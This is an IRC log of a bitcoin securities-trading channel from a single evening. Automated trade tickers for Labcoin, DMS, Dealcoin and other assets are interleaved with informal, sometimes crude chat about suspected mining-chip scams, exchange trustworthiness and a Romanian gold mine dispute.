begins. Sep 03 19:14:01 [BTCTC] [NASTY-PT] 2 @ 0.002999 = 0.006 BTC [+] Sep 03 19:14:26 i wonder if BFL bought AM Sep 03 19:14:28 [HAVELOCK] [XBOND] 18 @ 0.0011 = 0.0198 BTC [+] Sep 03 19:14:55 bfl has been kinda out of funds for the current year. Sep 03 19:15:02 if they did it wasn't much. Sep 03 19:15:09 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002383 = 0.0005 BTC [+] Sep 03 19:15:35 even funnier is that if you are correct, some of these guys also claimed to be making their own chips, some counting on Avalon for that Sep 03 19:15:47 and now Avalon isnt gonna deliver Sep 03 19:15:53 [BTCTC] [DMS.MINING] 7 @ 0.002781 = 0.0195 BTC [-] Sep 03 19:16:12 so labcoin and actm will resort to buying random chips from mouser Sep 03 19:16:17 and showing pics Sep 03 19:17:51 [BTCTC] [LABCOIN] 5 @ 0.003749 = 0.0187 BTC [-] Sep 03 19:17:57 [BTCTC] [ACTIVEMINING] 5 @ 0.004047 = 0.0202 BTC [-] Sep 03 19:17:59 [BTCTC] [LABCOIN] 659 @ 0.00375 = 2.4713 BTC [+] Sep 03 19:18:00 [BTCTC] [LABCOIN] 3553 @ 0.00375 = 13.3238 BTC [+] Sep 03 19:18:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0007755 BTC [+] Sep 03 19:19:24 [BTCTC] [LABCOIN] 70 @ 0.003748 = 0.2624 BTC [-] Sep 03 19:19:24 perhaps./ Sep 03 19:19:34 i think as time goes by the incentive to split is getting strongert and stronger Sep 03 19:19:50 even if they'd have argued all up and down all the summer that it's not what they intend. Sep 03 19:20:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.01578 BTC [-] Sep 03 19:20:20 fact of the matter is, business doesn't give a shit, sooner or later the tide goes out. when that happens all the naked swimmers don't really get the choice to run off and dress. Sep 03 19:20:24 here: https://bitcointalk.org/index.php?topic=263445.msg3034290#msg3034290 Sep 03 19:20:42 [HAVELOCK] [SMG] 50 @ 0.00021 = 0.0105 BTC [+] Sep 03 19:21:12 labcoin has 2 chips Sep 03 19:21:31 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0007755 = 0.0023 BTC [+] Sep 03 19:21:39 one with a circle on it, another with a bigger circle Sep 03 19:22:00 [BTCTC] [BITVPS] 2 @ 0.002549 = 0.0051 BTC [+] Sep 03 19:22:13 [HAVELOCK] [SMG] 3 @ 0.000219 = 0.0007 BTC [+] Sep 03 19:24:34 https://bitcointalk.org/index.php?topic=283075.msg3073127#msg3073127 Sep 03 19:24:38 [HAVELOCK] Dealcoin Official Thread Sep 03 19:25:34 lol Sep 03 19:26:04 hahaha Sep 03 19:26:10 did you make that 2nd one ? Sep 03 19:26:36 2nd one? Sep 03 19:26:46 i just googled gem unicorn Sep 03 19:26:48 and picked Sep 03 19:27:02 a kk Sep 03 19:27:07 it's great. Sep 03 19:27:57 theyll probably think i'm saying i bought all the dealco Sep 03 19:28:09 sure. Sep 03 19:28:21 in general they'll "think" whatever seems most convenient at any point. Sep 03 19:28:43 [BTCTC] [LABCOIN] 17 @ 0.00366 = 0.0622 BTC [-] Sep 03 19:29:43 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 03 19:29:57 [BTCTC] [LABCOIN] 5 @ 0.00366 = 0.0183 BTC [-] Sep 03 19:30:10 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] Sep 03 19:30:12 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [+] Sep 03 19:30:53 [BTCTC] [ASICMINER-PT] 2 @ 2.488 = 4.976 BTC [+] Sep 03 19:31:45 [BTCTC] [ASICMINER-PT] 4 @ 2.49 = 9.96 BTC [+] Sep 03 19:31:47 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Sep 03 19:33:41 [BTCTC] [DMS.MINING] 17 @ 0.002925 = 0.0497 BTC [+] Sep 03 19:33:42 [BTCTC] [DMS.MINING] 21 @ 0.002925 = 0.0614 BTC [+] Sep 03 19:33:42 [BTCTC] [DMS.MINING] 80 @ 0.00295 = 0.236 BTC [+] Sep 03 19:33:44 [BTCTC] [DMS.MINING] 1 @ 0.002976 BTC [+] Sep 03 19:33:46 [BTCTC] [DMS.MINING] 1 @ 0.002976 BTC [+] Sep 03 19:33:46 [BTCTC] [DMS.MINING] 300 @ 0.002976 = 0.8928 BTC [+] Sep 03 19:33:48 [BTCTC] [DMS.MINING] 22 @ 0.002977 = 0.0655 BTC [+] Sep 03 19:33:48 [BTCTC] [DMS.MINING] 111 @ 0.002977 = 0.3304 BTC [+] Sep 03 19:33:49 [BTCTC] [DMS.MINING] 110 @ 0.002978 = 0.3276 BTC [+] Sep 03 19:33:50 [BTCTC] [DMS.MINING] 500 @ 0.00299 = 1.495 BTC [+] Sep 03 19:34:57 [BTCTC] [DMS.PURCHASE] 12 @ 0.01578 = 0.1894 BTC [-] Sep 03 19:37:21 [BTCTC] [LABCOIN] 5 @ 0.003744 = 0.0187 BTC [+] Sep 03 19:37:23 [BTCTC] [LABCOIN] 438 @ 0.003745 = 1.6403 BTC [+] Sep 03 19:37:23 [BTCTC] [LABCOIN] 1265 @ 0.003747 = 4.74 BTC [+] Sep 03 19:38:03 [BTCTC] [LABCOIN] 10 @ 0.003744 = 0.0374 BTC [-] Sep 03 19:38:09 [MPEX] [S.MPOE] 12727 @ 0.0008679 = 11.0458 BTC [-] Sep 03 19:38:10 [MPEX] [S.MPOE] 4573 @ 0.00086661 = 3.963 BTC [-] Sep 03 19:38:46 [BTCTC] [BITVPS] 3 @ 0.002549 = 0.0076 BTC [+] Sep 03 19:38:55 [MPEX] [S.MPOE] 4266 @ 0.00086661 = 3.697 BTC [-] Sep 03 19:38:57 [MPEX] [S.MPOE] 2034 @ 0.00086395 = 1.7573 BTC [-] Sep 03 19:40:31 [BTCTC] [DMS.MINING] 10 @ 0.002782 = 0.0278 BTC [-] Sep 03 19:40:54 [BTCTC] [DMS.MINING] 420 @ 0.002976 = 1.2499 BTC [+] Sep 03 19:41:14 lol @ those labcoin chip pics. Identical chips all over alibaba/express. Sep 03 19:41:19 [BTCTC] [DMS.MINING] 1 @ 0.002781 BTC [-] Sep 03 19:41:36 Ah well you should express your concern over on the forums ;) Sep 03 19:41:44 [BTCTC] [DMS.MINING] 9 @ 0.00279 = 0.0251 BTC [+] Sep 03 19:42:01 Rulother so we get to watch yet another emergency!cover this post! forum sock action ? Sep 03 19:42:05 [BTCTC] [DMS.MINING] 300 @ 0.00279 = 0.837 BTC [+] Sep 03 19:42:07 [HAVELOCK] [SDSTM] 4 @ 0.0035 = 0.014 BTC [-] Sep 03 19:42:22 something like that Sep 03 19:42:30 [BTCTC] [DMS.MINING] 9 @ 0.00278 = 0.025 BTC [-] Sep 03 19:42:32 [BTCTC] [LABCOIN] 5 @ 0.003622 = 0.0181 BTC [-] Sep 03 19:42:33 [BTCTC] [LABCOIN] 25 @ 0.003621 = 0.0905 BTC [-] Sep 03 19:42:35 [BTCTC] [LABCOIN] 100 @ 0.003618 = 0.3618 BTC [-] Sep 03 19:42:36 [BTCTC] [LABCOIN] 78 @ 0.003607 = 0.2813 BTC [-] Sep 03 19:42:38 [BTCTC] [DMS.MINING] 10 @ 0.002999 = 0.03 BTC [+] Sep 03 19:42:39 ah well Sep 03 19:42:49 [BTCTC] [DMS.MINING] 83 @ 0.002775 = 0.2303 BTC [-] Sep 03 19:42:51 [BTCTC] [DMS.MINING] 1 @ 0.002775 BTC [-] Sep 03 19:43:04 [BTCTC] [LABCOIN] 89 @ 0.003608 = 0.3211 BTC [+] Sep 03 19:43:16 Rawted that happens to be one of the most common chip packages. sort-of like a honda civic, you know ? Sep 03 19:43:16 [BTCTC] [DMS.SELLING] 8 @ 0.01323 = 0.1058 BTC [+] Sep 03 19:43:31 [BTCTC] [DMS.MINING] 10 @ 0.002756 = 0.0276 BTC [-] Sep 03 19:43:37 the objection however is that they are differently marked (ie, the hole is of diff sizes) Sep 03 19:43:53 [BTCTC] [DMS.MINING] 3 @ 0.002755 = 0.0083 BTC [-] Sep 03 19:44:11 [BTCTC] [DMS.MINING] 77 @ 0.002754 = 0.2121 BTC [-] Sep 03 19:44:17 yeah i hear you bud, i just find it amusing - the instant trust and all the 2 month old regged accounts that are financial experts because they invested in labcoin/actm. theyre worse than the fudsters. Sep 03 19:44:31 [BTCTC] [DMS.MINING] 4 @ 0.00275 = 0.011 BTC [-] Sep 03 19:44:52 yeah. this is the beauty of the free market : it exposes, unmitigated, raw, the ugly underbelly of human stupidity. Sep 03 19:44:53 [BTCTC] [DMS.MINING] 10 @ 0.002731 = 0.0273 BTC [-] Sep 03 19:44:57 that's why it's such a tool of progress. Sep 03 19:45:25 [BTCTC] [DMS.MINING] 50 @ 0.002725 = 0.1363 BTC [-] Sep 03 19:45:31 very true Sep 03 19:46:09 but nothing progesses, idiots continue to produce more idiots and we're left with 99% of crap all the time anyways Sep 03 19:46:34 benkay also known as the infinite hitpoints problem. Sep 03 19:46:49 [HAVELOCK] [LABCO] 100 @ 0.003005 = 0.3005 BTC [+] Sep 03 19:47:27 [BTCTC] [DMS.SELLING] 76 @ 0.01323 = 1.0055 BTC [+] Sep 03 19:47:41 if the hitpoints are truly infinite so is the profit Sep 03 19:47:42 just because there's a tool of progress there's no guarantee any progress is taking place. keeping a dildo in a drawer somewhere don't mean you're getting fucked. Sep 03 19:48:04 ThickAsThieves that's actually the correct counterpoint. they aren't REALLY infinite, as they can't be. they just seem that way. Sep 03 19:48:33 [BTCTC] [DMS.MINING] 10 @ 0.002726 = 0.0273 BTC [+] Sep 03 19:49:07 eventually they all convert into the poor, pointing at meanies that have all the money and power Sep 03 19:49:19 yeah. because they STOLE them. Sep 03 19:49:24 yep Sep 03 19:49:26 through, you know, not being retarded forumscam muppets. Sep 03 19:49:31 ALL PROPERTY IS THEFT!!! Sep 03 19:49:33 [BTCTC] [DMS.MINING] 2 @ 0.00295 = 0.0059 BTC [+] Sep 03 19:49:36 WE HAVE A RIGHT TO BE DUMB!!! Sep 03 19:49:44 regulate! Sep 03 19:49:52 o yes that too. Sep 03 19:50:29 [HAVELOCK] [AM100] 4 @ 0.0235499 = 0.0942 BTC [+] Sep 03 19:50:58 [BTCTC] [DMS.PURCHASE] 4 @ 0.01578 = 0.0631 BTC [-] Sep 03 19:52:24 [HAVELOCK] [XBOND] 4 @ 0.00110599 = 0.0044 BTC [+] Sep 03 19:56:16 [HAVELOCK] [XBOND] 85 @ 0.00106 = 0.0901 BTC [-] Sep 03 19:57:29 [BTCTC] [DMS.PURCHASE] 470 @ 0.01578 = 7.4166 BTC [-] Sep 03 20:00:18 [BTCTC] [DMS.SELLING] 45 @ 0.01296 = 0.5832 BTC [-] Sep 03 20:00:20 [BTCTC] [DMS.SELLING] 170 @ 0.01295 = 2.2015 BTC [-] Sep 03 20:00:21 [BTCTC] [DMS.SELLING] 100 @ 0.01292 = 1.292 BTC [-] Sep 03 20:06:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0007755 BTC [+] Sep 03 20:06:51 [HAVELOCK] [XBOND] 2 @ 0.00109 = 0.0022 BTC [+] Sep 03 20:06:54 [HAVELOCK] [XBOND] 134 @ 0.00109 = 0.1461 BTC [+] Sep 03 20:08:02 [HAVELOCK] [LABCO] 1 @ 0.0031 BTC [+] Sep 03 20:08:46 hey coingenuity: i know you see my PMS. when you get done scamming honest bitcoin users, maybe you can devote some time to responding to them, or wait for the suit paperwork - your call. Sep 03 20:10:39 [BTCTC] [DMS.MINING] 4 @ 0.002899 = 0.0116 BTC [-] Sep 03 20:10:40 [BTCTC] [DMS.MINING] 10 @ 0.002899 = 0.029 BTC [-] Sep 03 20:10:40 [BTCTC] [DMS.MINING] 32 @ 0.002899 = 0.0928 BTC [-] Sep 03 20:10:41 [BTCTC] [DMS.MINING] 793 @ 0.0029 = 2.2997 BTC [+] Sep 03 20:12:41 what's that all about ? Sep 03 20:13:02 them is fightin' words Sep 03 20:13:02 [HAVELOCK] [XBOND] 1 @ 0.001056 BTC [-] Sep 03 20:13:04 [HAVELOCK] [XBOND] 13 @ 0.001055 = 0.0137 BTC [-] Sep 03 20:13:32 feel free to PM me, ill tell you the truth about coingenuity/coinabul/jay shore. Sep 03 20:13:53 grubles you ever show up in eve ? Sep 03 20:14:17 hm? Sep 03 20:14:29 nah i havent resubbed in a while Sep 03 20:15:14 [BTCTC] [LABCOIN] 1 @ 0.003701 BTC [+] Sep 03 20:15:26 thought you were asking to join 1btc a coupla days back. Sep 03 20:15:48 yeah Sep 03 20:15:53 was just curious :) Sep 03 20:16:19 :p Sep 03 20:16:23 [BTCTC] [DMS.PURCHASE] 1 @ 0.01578 BTC [-] Sep 03 20:16:44 [BTCTC] [KENILWORTH] 3 @ 0.001623 = 0.0049 BTC [-] Sep 03 20:20:28 [BTCTC] [BITVPS] 9 @ 0.002275 = 0.0205 BTC [-] Sep 03 20:23:04 [HAVELOCK] [AM100] 4 @ 0.0235499 = 0.0942 BTC [+] Sep 03 20:23:55 [BTCTC] [DMS.MINING] 42 @ 0.0027 = 0.1134 BTC [-] Sep 03 20:24:12 [HAVELOCK] [XBOND] 3 @ 0.001089 = 0.0033 BTC [+] Sep 03 20:24:42 [HAVELOCK] [AM100] 9 @ 0.0235499 = 0.2119 BTC [+] Sep 03 20:25:56 [HAVELOCK] [AM100] 1 @ 0.022 BTC [-] Sep 03 20:26:09 [BTCTC] [LABCOIN] 7 @ 0.0037 = 0.0259 BTC [-] Sep 03 20:26:21 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Sep 03 20:28:03 [HAVELOCK] [DEALCO] 185 @ 0.019 = 3.515 BTC [+] Sep 03 20:29:46 hah Sep 03 20:29:46 [HAVELOCK] [DEALCO] 2 @ 0.019 = 0.038 BTC [+] Sep 03 20:29:56 not bad Sep 03 20:30:08 [HAVELOCK] [AM100] 10 @ 0.02191001 = 0.2191 BTC [-] Sep 03 20:30:47 [HAVELOCK] [DEALCO] 11 @ 0.01889 = 0.2078 BTC [-] Sep 03 20:32:27 [BTCTC] [BTC-GROWTH] 5 @ 0.1001 = 0.5005 BTC [+] Sep 03 20:32:28 [BTCTC] [BTC-GROWTH] 10 @ 0.1001 = 1.001 BTC [+] Sep 03 20:32:29 Rawted so basically the dispute is what, poor moderation practices on bitcoin-otc ? Sep 03 20:32:29 [BTCTC] [BTC-GROWTH] 20 @ 0.1005 = 2.01 BTC [+] Sep 03 20:32:31 [BTCTC] [BTC-GROWTH] 5 @ 0.1008 = 0.504 BTC [+] Sep 03 20:32:32 [BTCTC] [BTC-GROWTH] 15 @ 0.1009 = 1.5135 BTC [+] Sep 03 20:32:32 [BTCTC] [BTC-GROWTH] 5 @ 0.1009 = 0.5045 BTC [+] Sep 03 20:32:36 [HAVELOCK] [XBOND] 14 @ 0.001089 = 0.0152 BTC [+] Sep 03 20:32:39 [BTCTC] [ACTIVEMINING] 1 @ 0.003822 BTC [-] Sep 03 20:32:47 hardly a secret, it's why that chan turned into the forum a year or two ago. what do you care ? Sep 03 20:32:59 [HAVELOCK] [DEALCO] 100 @ 0.01888 = 1.888 BTC [-] Sep 03 20:32:59 Sure, if you want to dilute it. I fear you've only read the one topic though! Sep 03 20:33:03 [HAVELOCK] [DEALCO] 100 @ 0.01888 = 1.888 BTC [-] Sep 03 20:33:14 some chans will be shit. find the good ones and live happily ever after. Sep 03 20:33:50 [MPEX] [S.MPOE] 6900 @ 0.00086943 = 5.9991 BTC [+] Sep 03 20:35:29 [BTCTC] [ACTIVEMINING] 2 @ 0.003823 = 0.0076 BTC [+] Sep 03 20:35:31 [BTCTC] [ACTIVEMINING] 9 @ 0.003822 = 0.0344 BTC [-] Sep 03 20:37:40 [HAVELOCK] [XBOND] 24 @ 0.001055 = 0.0253 BTC [-] Sep 03 20:37:55 [HAVELOCK] [AM100] 1 @ 0.0235 BTC [+] Sep 03 20:37:57 [HAVELOCK] [AM100] 2 @ 0.023 = 0.046 BTC [-] Sep 03 20:38:26 what the fuck dealcoin ipo already finished? Sep 03 20:38:39 I thought I had the time to go out for a while Sep 03 20:38:39 yep Sep 03 20:38:41 fuck me Sep 03 20:38:46 nah I'm good Sep 03 20:39:05 it sold out in less than 5 minutes Sep 03 20:39:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000759 BTC [-] Sep 03 20:40:11 [HAVELOCK] [DEALCO] 200 @ 0.012 = 2.4 BTC [-] Sep 03 20:40:56 [HAVELOCK] [DEALCO] 50 @ 0.011 = 0.55 BTC [-] Sep 03 20:40:58 [HAVELOCK] [DEALCO] 234 @ 0.011 = 2.574 BTC [-] Sep 03 20:41:01 [HAVELOCK] [DEALCO] 10 @ 0.014 = 0.14 BTC [+] Sep 03 20:41:23 mircea_popescu, perhaps you can suggest some good ones besides the pit to trade in? Although i have to admit localbitcoins.com is much easier than any trade ive ever done on OTC. Sep 03 20:41:27 [HAVELOCK] [DEALCO] 10 @ 0.01399999 = 0.14 BTC [-] Sep 03 20:41:40 [BTCTC] [LABCOIN] 10 @ 0.003706 = 0.0371 BTC [+] Sep 03 20:41:42 [BTCTC] [LABCOIN] 5 @ 0.003707 = 0.0185 BTC [+] Sep 03 20:41:43 [BTCTC] [LABCOIN] 15 @ 0.003732 = 0.056 BTC [+] Sep 03 20:41:44 [BTCTC] [LABCOIN] 399 @ 0.003733 = 1.4895 BTC [+] Sep 03 20:41:45 [BTCTC] [LABCOIN] 100 @ 0.003735 = 0.3735 BTC [+] Sep 03 20:41:45 [BTCTC] [LABCOIN] 196 @ 0.003749 = 0.7348 BTC [+] Sep 03 20:41:47 [BTCTC] [DMS.SELLING] 426 @ 0.01323 = 5.636 BTC [+] Sep 03 20:42:22 trade what, you mean ? gold ? Sep 03 20:42:35 [BTCTC] [LABCOIN] 25 @ 0.003747 = 0.0937 BTC [-] Sep 03 20:42:45 [BTCTC] [ACTIVEMINING] 2 @ 0.00397 = 0.0079 BTC [+] Sep 03 20:42:46 [BTCTC] [ACTIVEMINING] 10 @ 0.003971 = 0.0397 BTC [+] Sep 03 20:43:03 [MPEX] [S.MPOE] 4750 @ 0.00086883 = 4.1269 BTC [-] Sep 03 20:43:08 [MPEX] [S.MPOE] 4450 @ 0.00086994 = 3.8712 BTC [+] Sep 03 20:43:19 [BTCTC] [ACTIVEMINING] 1988 @ 0.00398 = 7.9122 BTC [+] Sep 03 20:43:28 [BTCTC] [DMS.SELLING] 10 @ 0.01323 = 0.1323 BTC [+] Sep 03 20:43:28 [BTCTC] [DMS.SELLING] 109 @ 0.01325 = 1.4443 BTC [+] Sep 03 20:43:30 btc/ltc Sep 03 20:44:36 i've never traded that pair, i have no idea where it goes down Sep 03 20:44:48 possibly on some derivative of the trollbox of btce Sep 03 20:45:22 Yeah, hence the issue. Oh well, thanks for attempting to help bud. Sep 03 20:45:33 [HAVELOCK] [DEALCO] 5 @ 0.01299 = 0.065 BTC [-] Sep 03 20:46:35 I need to convince my PI to take btc so i dont lose so much on the conversions. Sep 03 20:46:46 [HAVELOCK] [AM100] 1 @ 0.023 BTC [-] Sep 03 20:46:51 Rawted: btc-e having issues or something? Sep 03 20:47:00 they do btc/ltc, right? Sep 03 20:47:04 nah i just dont trust that site at all. Sep 03 20:47:12 me either Sep 03 20:47:23 shady as all hell, and impossible for US based traders to get their money out. Sep 03 20:47:45 now i made a killing on FTC there, but i felt so bad about it i stopped mining altcoins lol. Sep 03 20:47:55 felt bad about making money? Sep 03 20:48:02 i think you're in the wrong channel. Sep 03 20:48:08 :P Sep 03 20:48:11 ;) Sep 03 20:48:19 i don't trust any of them anymore. Sep 03 20:48:25 more of the taking advantage of lesser intelligenced people bothered me Sep 03 20:48:31 [HAVELOCK] [DEALCO] 2 @ 0.012 = 0.024 BTC [-] Sep 03 20:48:44 that's business. Sep 03 20:48:46 the only one i can say good things about is coinbase Sep 03 20:48:59 i have had no issues, 2 day deposits,etc - but ive only sold there. Sep 03 20:49:06 they did finally get their shit together, it seems. Sep 03 20:49:30 i am still convinced theyre feeding bitcoiners info to the feds. Sep 03 20:49:34 [HAVELOCK] [DEALCO] 1 @ 0.0115 BTC [-] Sep 03 20:49:36 but oh well, life is short, come get me. Sep 03 20:49:39 if you buy from them or sell from them, never leave a balance at coinbase. Sep 03 20:50:04 [BTCTC] [DMS.PURCHASE] 109 @ 0.01578 = 1.72 BTC [-] Sep 03 20:50:06 rawted, they don't have too, FEDs have your bank records no problem. Sep 03 20:50:18 and they're reading your IRC chats. Sep 03 20:50:20 :) Sep 03 20:50:30 [BTCTC] [DMS.PURCHASE] 109 @ 0.01578 = 1.72 BTC [-] Sep 03 20:50:33 whaddaya think about this mircea_popescu http://stream.aljazeera.com/story/201309022127-0023023 Sep 03 20:50:52 oh for sure, but they at least have to do a little digging for it, and its supposed to be warranted. having a company directly feed the info to them bypases all that legal mumbo jumbo, which is what worries me. Sep 03 20:50:55 [HAVELOCK] [DEALCO] 2 @ 0.012 = 0.024 BTC [+] Sep 03 20:51:03 [HAVELOCK] [LABCO] 1 @ 0.0031 BTC [+] Sep 03 20:52:27 [HAVELOCK] [DEALCO] 1 @ 0.0111 BTC [-] Sep 03 20:52:28 grubles old story. romania has huge gold deposits. always has. some dubious firm wants to raze a mountain do cyanide extraction on some cubic km of ore. Sep 03 20:52:44 that mountain happens to have been inhabited since the time of the romans (who were also mining gold there) Sep 03 20:52:48 [HAVELOCK] [DEALCO] 266 @ 0.011 = 2.926 BTC [-] Sep 03 20:52:50 [HAVELOCK] [DEALCO] 314 @ 0.011 = 3.454 BTC [-] Sep 03 20:52:58 DEALICIOUS! Sep 03 20:53:06 [HAVELOCK] [DEALCO] 189 @ 0.011 = 2.079 BTC [-] Sep 03 20:53:17 they've been trying to do it for > 10 years by now, much like the riaa/mpaa have been trying to be shitheads for > 10 years by now Sep 03 20:53:25 so far these shitheads have been humiliated every single time. Sep 03 20:53:31 unlike the riaa/mpaa shitheads. Sep 03 20:53:57 why aren't romanians mining themselves? too lazy? Sep 03 20:54:32 but why the fuck would you mine it ? to bury it someplace else ? Sep 03 20:54:42 [HAVELOCK] [XBOND] 864 @ 0.00106 = 0.9158 BTC [+] Sep 03 20:54:58 just let it be where it is, put a postit note on it saying "Romanian Central Bank Gold Vault - Rosia Montana division" Sep 03 20:55:06 [HAVELOCK] [XBOND] 1090 @ 0.00106 = 1.1554 BTC [+] Sep 03 20:55:08 lol Sep 03 20:55:25 [HAVELOCK] [XBOND] 46 @ 0.00106 = 0.0488 BTC [+] Sep 03 20:56:17 http://trilema.com/2009/ce-bine-ca-ne-am-unit-mai-fratilor/ < this is from the 2009 rendition of the same stuff Sep 03 20:56:20 Ce bine ca ne-am unit mai fratilor pe Trilema - Un blog de Mircea Popescu. Sep 03 20:56:24 http://trilema.com/2010/hai-sa-facem-si-noi-de-astea/ < 2010. Sep 03 20:56:25 etc. Sep 03 20:56:27 Hai sa facem si noi de-astea pe Trilema - Un blog de Mircea Popescu. Sep 03 20:57:17 http://trilema.com/2011/mizeria-umana/ 2011 Sep 03 20:57:19 Mizeria umana pe Trilema - Un blog de Mircea Popescu. Sep 03 20:57:22 im done writing on the topic lol Sep 03 20:57:47 [HAVELOCK] [DEALCO] 96 @ 0.011 = 1.056 BTC [-] Sep 03 20:58:33 http://trilema.com/2011/jaful-si-economia/ << that's a full write-up of the logic behind the opposition. the various groups actually opposing the mine more or less took those ideas and are packaging best they can to this day. Sep 03 20:58:35 Jaful si economia pe Trilema - Un blog de Mircea Popescu. Sep 03 20:58:38 [HAVELOCK] [SMG] 50 @ 0.00019 = 0.0095 BTC [-] Sep 03 20:59:03 [BTCTC] [RSM] 1 @ 0.01099 BTC [+] Sep 03 20:59:05 [BTCTC] [RSM] 129 @ 0.011 = 1.419 BTC [+] Sep 03 20:59:09 [BTCTC] [TAT.MINIGAME] 55 @ 0.0001655 = 0.0091 BTC [-] Sep 03 20:59:31 [HAVELOCK] [AM100] 4 @ 0.02355 = 0.0942 BTC [+] Sep 03 21:00:03 [HAVELOCK] [AM100] 3 @ 0.0235599 = 0.0707 BTC [+] Sep 03 21:00:20 [BTCTC] [LABCOIN] 3 @ 0.003746 = 0.0112 BTC [-] Sep 03 21:00:35 [BTCTC] [LABCOIN] 97 @ 0.003746 = 0.3634 BTC [-] Sep 03 21:00:50 [BTCTC] [BTC-GROWTH] 10 @ 0.101 = 1.01 BTC [+] Sep 03 21:01:00 [HAVELOCK] [LABCO] 390 @ 0.0032 = 1.248 BTC [+] Sep 03 21:01:56 [BTCTC] [LABCOIN] 2 @ 0.003746 = 0.0075 BTC [-] Sep 03 21:02:12 [BTCTC] [DMS.MINING] 1 @ 0.002897 BTC [+] Sep 03 21:04:05 [HAVELOCK] [DEALCO] 379 @ 0.0111 = 4.2069 BTC [+] Sep 03 21:04:13 [BTCTC] [ACTIVEMINING] 1 @ 0.003809 BTC [-] Sep 03 21:04:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0005604 BTC [-] Sep 03 21:05:00 [HAVELOCK] [DEALCO] 100 @ 0.0111 = 1.11 BTC [+] Sep 03 21:05:03 [HAVELOCK] [XBOND] 200 @ 0.001049 = 0.2098 BTC [-] Sep 03 21:05:31 [BTCTC] [DMS.MINING] 1 @ 0.002897 BTC [+] Sep 03 21:07:09 [BTCTC] [LABCOIN] 1 @ 0.003747 BTC [+] Sep 03 21:07:26 [HAVELOCK] [DEALCO] 421 @ 0.0111 = 4.6731 BTC [+] Sep 03 21:07:44 [BTCTC] [S.BBET-PT] 1 @ 0.001582 BTC [+] Sep 03 21:08:14 [BTCTC] [ASICMINER-PT] 3 @ 2.47 = 7.41 BTC [-] Sep 03 21:10:03 [HAVELOCK] [DEALCO] 9 @ 0.0111 = 0.0999 BTC [+] Sep 03 21:10:45 [BTCTC] [S.BBET-PT] 1 @ 0.000621 BTC [-] Sep 03 21:10:49 [HAVELOCK] [SMG] 1 @ 0.00018905 BTC [-] Sep 03 21:10:58 [HAVELOCK] [SMG] 64 @ 0.000189 = 0.0121 BTC [-] Sep 03 21:11:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.024 = 0.36 BTC [+] Sep 03 21:12:09 [BTCTC] [PETA-MINE] 2 @ 0.649 = 1.298 BTC [-] Sep 03 21:12:16 [HAVELOCK] [SMG] 43 @ 0.000189 = 0.0081 BTC [-] Sep 03 21:12:53 [BTCTC] [PETA-MINE] 3 @ 0.6499 = 1.9497 BTC [+] Sep 03 21:13:25 [HAVELOCK] [DEALCO] 1 @ 0.0111 BTC [+] Sep 03 21:15:26 ;;premium mtgox bitstamp Sep 03 21:15:29 mtgox premium over bitstamp is currently 10.4379323568 %. Sep 03 21:16:09 ;;ticker Sep 03 21:16:10 MtGox BTCUSD ticker | Best bid: 144.00013, Best ask: 144.19000, Bid-ask spread: 0.18987, Last trade: 144.00002, 24 hour volume: 14950.82974426, 24 hour low: 142.20000, 24 hour high: 148.90893, 24 hour vwap: 145.35591 Sep 03 21:16:57 [BTCTC] [PAJKA.BOND] 9 @ 0.0123 = 0.1107 BTC [-] Sep 03 21:17:05 [BTCTC] [LABCOIN] 200 @ 0.003699 = 0.7398 BTC [-] Sep 03 21:17:17 [HAVELOCK] [CFIG] 2 @ 0.13 = 0.26 BTC [-] Sep 03 21:17:21 [BTCTC] [LABCOIN] 149 @ 0.003699 = 0.5512 BTC [-] Sep 03 21:18:09 [HAVELOCK] [DEALCO] 9 @ 0.013 = 0.117 BTC [+] Sep 03 21:18:14 [HAVELOCK] [DEALCO] 1 @ 0.013 BTC [+] Sep 03 21:18:48 [BTCTC] [PAJKA.BOND] 9 @ 0.01249 = 0.1124 BTC [+] Sep 03 21:19:18 [HAVELOCK] [CFIG] 7 @ 0.125 = 0.875 BTC [-] Sep 03 21:19:40 [HAVELOCK] [DEALCO] 59 @ 0.013 = 0.767 BTC [+] Sep 03 21:20:33 ;;nethash Sep 03 21:20:34 700213.039585 Sep 03 21:20:39 going down! Sep 03 21:20:41 .d Sep 03 21:20:41 65750060.14908 | Next Diff in 85 blocks | Estimated Change: 31.6479% in 0d 9h 38m 57s Sep 03 21:20:43 it is Sep 03 21:20:44 lol Sep 03 21:20:55 [BTCTC] [PAJKA.BOND] 2 @ 0.0125 = 0.025 BTC [+] Sep 03 21:20:57 must be someone testing then shipping Sep 03 21:21:01 ;;calc 0.013100 + 0.0028 Sep 03 21:21:02 0.0159 Sep 03 21:21:33 [BTCTC] [DMS.MINING] 8 @ 0.002897 = 0.0232 BTC [+] Sep 03 21:21:34 [BTCTC] [DMS.MINING] 1 @ 0.002898 BTC [+] Sep 03 21:21:36 [BTCTC] [DMS.MINING] 32 @ 0.0029 = 0.0928 BTC [+] Sep 03 21:21:37 [BTCTC] [DMS.MINING] 359 @ 0.0029 = 1.0411 BTC [+] Sep 03 21:23:28 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [+] Sep 03 21:23:29 [BTCTC] [ACTIVEMINING] 2 @ 0.003966 = 0.0079 BTC [+] Sep 03 21:23:38 why not test on testnet? Sep 03 21:23:43 seems a little scammy to me Sep 03 21:23:49 if you say so Sep 03 21:23:49 mircea_popescu is online lol Sep 03 21:24:04 hm ? Sep 03 21:25:11 [MPEX] [S.MPOE] 2600 @ 0.00086845 = 2.258 BTC [-] Sep 03 21:26:04 you guys (you and MPOE-PR) never really elaborated more on the Warren Buffet story (which can be seen on the forums) about the declining revenue for physical commodities Sep 03 21:26:19 thestringpuller: if you're testing the thing, you're burning electrons. if you can recoup the currency those electrons cost, your cost of testing just went down. so i ask you: why test on testnet? Sep 03 21:26:31 [HAVELOCK] [CFIG] 1 @ 0.121 BTC [-] Sep 03 21:27:12 I think the end 